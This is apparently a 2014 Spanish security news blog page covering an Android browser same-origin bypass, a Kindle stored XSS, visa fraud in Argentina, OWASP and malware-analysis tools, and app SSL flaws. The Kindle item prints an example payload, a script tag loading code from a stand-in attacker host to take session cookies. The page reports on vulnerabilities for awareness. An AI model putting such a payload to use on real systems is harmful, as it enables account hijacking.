18/9/2014

Fallo de seguridad y exploit en el navegador por defecto de #Android


El investigador Rafay Baloch ha publicado una vulnerabilidad, identificada como CVE-2014-6041, que afecta a la mayoría de los sistemas Android.

La Política del mismo origen o Same Origin Policy (SOP) es una medida de seguridad básica que deben implementar todos los navegadores actuales. La idea es muy sencilla: el código de una página que se ejecuta en cliente (casi siempre javascript) no debe ser capaz de acceder al código de otra.

Eso es porque, aunque hay algunas excepciones con unas pocas propiedades y atributos, si se permitiera acceder globalmente desde un origen a otro (Esquema, dominio y puerto) un sitio A podría acceder a las propiedades de otro sitio B, es decir, un sitio malicioso podría obtener las cookies, location, response, etc. de otro sitio por el que está navegando el usuario. Un ejemplo claro sería cuando un usuario accede a un sitio malicioso y es posible robar una sesión de Facebook abierta en otra pestaña del navegador.

Resulta que el navegador por defecto de todas las versiones de Android anteriores a la 4.4, el conocido como AOSP browser (Android Open Source Project), permite evadir La Política del mismo origen (SOP) cargando Javascript en un iframe o ventana cualquiera simplemente poniendo antes de "javascript:..." un byte nulo. Es lo que sería UXSS (Universal Cross-site Scripting).

Además, para facilitarnos más aún la vida, jvennix-r7 ha publicado un módulo de Metasploit que también soporta la evasión de x-frame-options cocinando así un exploit universal listo para su uso: https://github.com/rapid7/metasploit-framework/pull/3759.

Se recomienda actualizar el navegador si hay actualización disponible, o en caso contrario, utilizar navegadores alternativos, como Firefox o Chrome.
Para saber que versión de Android tiene un dispositivo hay que dirigirse al menú Ajustes > Acerca del teléfono > Versión de Android.

Fuente: OSI y Hackplayers

Argentina: Cayó red que falseaba datos para visas de EEUU

La Justicia investiga a una mujer detenida por la Policía Metropolitana, acusada de liderar una organización que creaba falsos perfiles socio-económicos para saltar las trabas burocráticas y acceder a la visa para ingresar a los Estados Unidos de América.
La mujer de 70 años era, también, propietaria de una agencia de turismo en la zona de Ramos Mejía en el conurbano bonaerense, y habría cobrado 500 dólares por cada uno de los más de cien trámites adulterados.

Hace seis meses comenzó la investigación cuando funcionarios de la Embajada detectaron irregularidades en algunos perfiles presentados, en los que los ingresos declarados no correspondían con la vestimenta de los postulantes y algunos domicilios presentados resultaban ser terrenos baldíos.

Esto motivó a realizar una denuncia en el Juzgado Criminal y Correccional Federal Nro. 3, a cargo de Daniel Rafecas que ordenó a la Policía Metropolitana que inicie la investigación.

El Área de Cibercrimen recolectó los registros de conexión de los trámites sospechados.

Tras ser analizados se pudo trazar un patrón y se localizó el área dónde operaba la banda. Se pudo ubicar a los lugares donde se iniciaba el trámite, que eran locutorios situados en el radio comprendido entre las avenidas Belgrano, Entre Ríos, Jujuy y Rivadavia.

Luego de realizar tareas de inteligencia en la zona la policía logró individualizar a la mujer cuando intercambiaba documentación con los postulantes y los llevaba a su domicilio.

Con los datos aportados por la investigación, la Justicia ordenó allanar dos domicilios. El primero fue la vivienda de la sospechosa, ubicada en la avenida Belgrano al 2600, en la localidad bonaerense de Ramos Mejía y luego la vivienda de un ciudadano camerunés que ofrecía servicios de gestoría en Internet, pero que no se encontraba en el país.

En los operativos se logró incautar una gran cantidad de documentación que se relaciona con el armado de carpetas y perfiles de más de un centenar de personas.

También se secuestraron certificados de constancia de trabajo en blanco, hojas con sellos de hospitales públicos, contratos de locación en blanco, pasaportes argentinos y extranjeros y hojas membretadas del Gobierno de la Ciudad de Buenos Aires. También se secuestraron computadoras y celulares.

La mujer quedó a disposición de la Justicia, bajo arresto domiciliario.

Fuente: Ambito

Vulnerabilidad en Kindle permite obtener detalles de la cuenta de usuario

Se ha anunciado una vulnerabilidad en el software del Kindle de Amazon que podría permitir a un atacante acceder a todos los detalles de una cuenta de Amazon.

El problema reside en un cross-site scripting almacenado, la más peligrosa de todas las formas de este tipo de ataques, en la librería Kindle de Amazon, en las páginas conocidas como "Manage Your Content and Devices" y "Manage your Kindle". El fallo se produce al descargar un libro electrónico desde un sitio que no sea la propia web de Amazon, y podría permitir inyectar código malicioso a través de los metadatos del libro (por ejemplo el título).

El atacante podrá crear un libro con un título como [script src="https://www.atacante.org/script.js"][/script].
Una vez que la víctima descargue el libro y lo tenga añadido a su librería, el código se ejecutara en el momento en que la víctima abra la página web de la librería del Kindle. Como resultado, el atacante podrá acceder y transferir las cookies de sesión de Amazón, por lo que la cuenta quedará comprometida. Existe disponible una prueba de concepto del problema.

Lo más sorprendente es que según Benjamin Daniel Mussler, investigador que ha dado a conocer el problema, reportó el problema a Amazon en noviembre de 2013 y fue corregido poco después. Sin embargo confirma que, hace dos meses, al publicar una nueva versión de la aplicación web "Manage your Kindle" se ha reintroducido la vulnerabilidad. Según confirma no ha obtenido respuesta a ninguna de sus comunicaciones.

Fuente: Hispasec

17/9/2014

Publicada Guía del Desarrollador OWASP v4

Para los que trabajamos asegurando aplicaciones web, sin dudas esta es una excelente noticia que traerá beneficios a todos los sitios web: se ha publciado la nueva OWASP Developer Guide 2014.

Esta una obra reescrita en su totalidad a partir de uno de los primeros proyectos de OWASP y también uno de los más descargados. El enfoque se movió desde las contramedidas y debilidades hacia la ingeniería de software seguro.

La primera guía del desarrollador de OWASP fue publicada en 2002, cuando todavía se usaba Internet Explorer y, desde entonces la web ha recorrido un largo camino. Por desgracia, la guía del desarrollador nunca realmente despegó en su público objetivo: los desarrolladores. La guía original trataba de cómo realizar pruebas de penetración de aplicaciones web, material que ahora está mejor cubierto en la Guía de Pruebas de OWASP.

La nueva guía del desarrollador 2014 es un libro sobre los "primeros principios" y no está específicamente orientado a un lenguaje de programación aunque sí hay temas muy específicos sobre diferentes lenguajes, tales como opciones de configuración o sobre cómo aplicar los principios básicos de seguridad sobre sistemas y aplicaciones.

La re-factorición del material original de la Developer Guide v2.0, lanzado en julio de 2005, permite enfocarse en las aplicaciones del mundo y de las aplicaciones web modernas que utilizan AJAX, API RESTful y conectividad móvil. Todo el material (sobrante) sobre la realización de pruebas se moverá a la OWASP Testing Guide y todo material de revisión de código a la OWASP Code Review Guide. .

Cristian de la Redacción de Segu-Info

Viper: herramienta de análisis y gestión de malware

El objetivo de Viper es proporcionar una solución para organizar fácilmente una colección de malware y explotar las muestras, para facilitar su investigación diaria. Es similar a un Metasploit para los investigadores de malware, proporciona una interfaz de terminal que se puede utilizar para: almacenar, buscar y analizar archivos, con un entorno para crear plugins fácilmente de cualquier tipo.

Viper permite crear y operar en una colección de archivos de muestras de malware. Una colección representa un proyecto. Se puede crear tantos proyectos como se desee y cambiar fácilmente de uno a otro. Cada proyecto tiene sus propios repositorios locales de los archivos binarios, una base de datos SQLite que contiene los metadatos y un archivo histórico que contiene todos los comandos que se proporcionan a través de la Shell de Viper. De esta manera se  pueden crear diferentes entornos de trabajo para cada campaña de malware, familia de malware o el entorno que se está investigando. También puede empaquetar fácilmente y compartir la carpeta del proyecto.
Las operaciones que se pueden ejecutar dentro Viper son fundamentalmente: comandos y módulos:
  • Los comandos son funciones proporcionadas por el núcleo de Viper que permiten interactuar con: el repositorio de archivos (mediante la adición, la búsqueda, el etiquetado y la eliminación de archivos), con proyectos y con las sesiones. Son estáticos y no deben modificarse.
  • Los módulos son plugins que se cargan dinámicamente por Viper en el arranque. Existen módulos para implementar funciones de análisis adicionales que se pueden ejecutar en un archivo abierto o en todo el repositorio, por ejemplo: el análisis de los ejecutables PE32, procesadores de documentos PDF, el análisis de los documentos de Office, archivos de agrupamiento por hash o ImpHash... Los módulos son la parte más desarrollada activamente de Viper gracias a las contribuciones de la comunidad.
Viper está escrito en Python y requiere Python 2.7 para funcionar correctamente. Funciona a la perfección en distribuciones basadas en Debian, como Ubuntu de plataforma de referencia. Es posible trabajar con ella en otras distribuciones Linux y en Mac OS X, pero no ha sido debidamente probado.

Fuente: Gurú de Informática

Aplicaciones móviles vulnerables al validar certificados digitales [CERT]

El CERT Coordination Center en la Universidad Carnegie Mellon (CERT/CC) ha publicado los resultados de sus pruebas llevadas a cabo en aplicaciones populares de Android que no validan correctamente los certificados SSL.

En varios posts hemos discutido sobre la validación incorrecta de los certificados SSL de dispositivos móviles, como por ejemplo la más reciente del caso de la aplicación de Gmail para dispositivos iOS. El hecho de que existan errores al momento de validar el certificado, expone a los usuarios a riesgos de ataques MitM y al consiguiente robo de información confidencial.

Ahora el CERT ha publicado una lista de aplicaciones populares de Android que no implementan correctamente la validación de Certificate Pinning.

Recientemente los expertos en seguridad de FireEye evaluaron el nivel de seguridad ofrecido por 1.000 aplicaciones gratuitas ofrecidas en Google Play y también en ese caso los resultados fueron chocantes: 68% de las app no comprueban los certificados del servidor y el 77% omite los errores SSL.
Ahora, según el CERT, las aplicaciones utilizan bibliotecas vulnerables como Flurry y Chartboost y por esta razón los usuarios de Android están expuestos a riesgos de ataques. A pesar de que FireEye notificó de los defectos a los desarrolladores, el CERT ha señalado que sólo unas pocas compañías tomaron medidas para asegurar sus productos.

En octubre de 2013, los investigadores alemanes Beekman y Thompson publicaron un estudio [PDF] donde revelaban que muchas aplicaciones no implementaban correctamente SSL exponiendo a los usuarios a ataques MitM. Sobre 13.500 de las aplicaciones gratuitas más populares en Google Play, el 8% implementaba SSL vulnerable y algunos de ellos recogían una gran cantidad de información personal.

El CERT condujo su estudio con pruebas automatizadas sobre las aplicaciones móviles Android más populares y sus expertos utilizaron una herramienta propia llamada CERT Tapioca (ver video), que "es un network-layer man-in-the-middle (MITM) basado en UbuFuzz y con mitmproxy preinstaldo".

La herramienta permite a los expertos buscar aplicaciones que fallan al validar certificados digitales y permite investigar tráfico de cualquier tipo HTTP/HTTPS. Los investigadores del CERT se pondrán en contacto con todos los equipos de desarrollo y diseñó de las aplicaciones para que sean conscientes de la vulnerabilidad y proporcionarán sugerencias para arreglarlos.

El CERT también hizo pública una hoja de cálculo que contiene la lista de las aplicaciones probadas, los resultados de las pruebas y muchos otros datos, incluyendo los identificadores CVE (CVE-2014-6024, CVE-2014-6025, CVE-2014-5524) para las vulnerabilidades descubiertas por su equipo.

Cristian de la Redacción de Segu-Info

Programas de recompensas para quienes encuentran vulnerabilidades

16/9/2014

El móvil, nuevo escenario de fraude bancario

Cada vez más transacciones bancarias se realizan desde el móvil, un 33% según los últimos datos de un estudio de RSA, la división de Seguridad de EMC, es decir, un 20% más con respecto a las operaciones realizadas durante 2013, y un 67% más desde 2012. Este escenario hace que en la actualidad una de cada cuatro operaciones fraudulentas identificadas se origine desde un dispositivo móvil, como indica el citado Informe sobre Fraude en Internet [PDF] en el que analiza el estado actual del cibercrimen en función de su experiencia y sus conocimientos en el rastreo de estas actividades delictivas.

En el estudio se pone de manifiesto también el aumento de ataques de phishing, que crecieron un 25% en julio con respecto al mes anterior. En total, se identificaron 42.571 ataques de este tipo con un impacto económico de entorno a 362 millones de dólares a nivel global.

En el periodo analizado por el informe de RSA (abril, mayo y junio de 2014) destaca especialmente una acción llevada a cabo por ciberdelincuentes brasileños. Se trata de una aplicación aparentemente dirigida a facilitar las transacciones de los usuarios de dispositivos Android e iPhone. Gracias a ella los ciberdelincuentes no solo comercializan los datos facilitados por sus clientes, sino que también consiguen hacerse con el control de sus dispositivos en el momento en el que la aplicación es descargada.

Fuente: TicBeat

Medir ancho de banda consumido en Linux

Aquí se mencionan algunas herramientas de línea de comandos de Linux que pueden ser utilizados para monitorear el uso de la red. Estas herramientas supervisam el tráfico que fluye a través de las interfaces de red y miden la velocidad a la que se están transfiriendo los datos. El tráfico entrante y saliente se muestra por separado.

Hay cuatro formas de medir, una es en vivo midiendo el tráfico total; la segunda es tomar los datos de los logs, la tercera es medir por socket y la cuarta muestra el ancho de banda utilizado por los procesos individuales. Esto hace que sea fácil de detectar un proceso que se uso excesivo del ancho de banda de red, incluso ante un DDoS.
Las herramientas tienen diferentes mecanismos de generación de informes de tráfico. Algunas de las herramientas como nload leen el archivo "/proc/net/dev" para obtener estadísticas de tráfico, mientras que otras utilizan la biblioteca pcap para capturar todos los paquetes y luego calcular el tamaño total y estimar la carga de tráfico.

Fuente: Binary Tides

LAIR: Framework colaborativo para pruebas de intrusión

Lair creada por Dan Kottmann es una herramienta desarrollada en Node.js y MongoDB  para documentar los hallazgos realizados durante un test de intrusión (Pentest) de forma colaborativa y centralizada . Algo muy similar a lo que ofrece el muy conocido Dradis. Lair permite importar resultados de NMAP, Nessus, Nexpose y Burp (video).

Proceso de instalación

A continuación veremos el proceso de instalación en Linux, si utilizan OSX pueden consultar el proceso de instalación aquí.

Instalar dependencias
sudo apt-get install build-essential python-dev python-pip python-dev build-essential libssl-dev
sudo pip install –upgrade pip
pip install pymongo
Descargar e Instalar Lair
wget https://github.com/fishnetsecurity/Lair/releases/download/v1.0.4/lair-v1.0.4-linux-x64.7z
p7zip -d lair-v1.0.4-linux-x64.7z
cd lair-v1.0.4-linux-x64/
./start.sh
Durante el primer inicio aparecerá un mensaje que pregunta si ya se agregaron los usuarios de mongodb.

Contenido completo en fuente original HotFixed